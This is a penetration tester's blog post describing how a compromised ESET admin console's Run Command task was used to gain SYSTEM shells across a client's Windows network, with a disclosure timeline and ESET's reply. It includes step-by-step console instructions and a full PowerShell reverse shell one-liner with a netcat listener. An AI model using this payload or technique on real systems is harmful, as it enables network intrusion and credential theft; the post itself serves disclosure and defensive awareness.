This is how i hacked into your corporate network using your own anti virus agent

~ h3llwings

Recently i was busy with one of my client project,which is a fully penetration testing assignment against his company.after the external pentest, I’ve moved into internal pentest.the company itself has Microsoft windows environment with active directory configured and they have been using eset endpoint as their anti virus.after few hours i was able to break into one of the server using very popular exploit ms17-***.

After few minutes i found clear text passwords which they had saved in a web browser and i managed to decrypt all the passwords and moved into lateral movements. Then i found ESET admin console passwords are along with them 😀 so i logged into admin console and i saw most of the computers are connected to the ESET endpoint.

eset_connected-pcs
Connected PCs

So i came up with this amazing idea,which is what if i can perform RCE against every connected device so i can get a shell from each of them. So i did some research and i found that ESET has a feature called Run Command Task[1], According to ESET documentation its mentioned that Run Command task can be used to execute specific command line instructions on the client.  and most important thing is it executes the commands with NT AUTHORITY\SYSTEM Privilege.  so after i found this i was able to get into active directory servers and dumped  the hashes and compromised entire network.

Then i reported about this issue to eset security team and i got this Reply from ESET Security Team: we do not consider this as vulnerability – it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple – BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network.

according to ESET security team looks like they don’t care about this issue very much, well but i have to say the impact is huge. if an attacker able to recovered the password of ERA server it’s gives full privilege to an attacker over the network. and finally to the sys admins never store your password plain text or in a web browser.  always make sure to use secure password store mechanisms.

POC

 

  1. Go to https://server_ip/era/webconsole/#id=CLIENTS
  2. Right click on any connected devices, that you want to do the RCE
  3. Click New Task, and fill up the basic info, such as task name and select Task to Run command. and then select settings tab and type the command you want to execute.and then click finish
    1. New task
    2. 3
    3. 4
  4. Then again select your target and click run task. and select your previous defined task, then select Trigger tab and make sure set trigger type As soon as possible. then click finish
    1. 6
  5. Game over !

Capture

PowerShell Reverse Shell Payload[2]

  1. powershell nop exec bypass c $client = New-Object System.Net.Sockets.TCPClient(”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  2. nc -lvp 443

Timeline:

Oct 10,2018: Initial discover

Jan 10,2019: Report submitted to security@eset.com

Jan 14,2019:Requested an update on the case

Jan 23,2019:Requested an update on the case

Apr 11,2019:Another report submitted to security@eset.com with POC and write up

Apr 22,2019:Requested an update on the case

May 5,2019: Requested more information and details on case

May 6,2019: found out its a feature of ESET AV

Reply from ESET Security Team:we do not consider this as vulnerability – it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple – BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network.

June 10,2019:Released  POC to public

June 11,2019: Released Blog post

Reference

[1]https://help.eset.com/esmc_admin/70/en-US/client_tasks_run_command.html

[2]https://gist.github.com/ohpe/bdd9d4385f8e6df26c02448f1bcc7a25

Leave a comment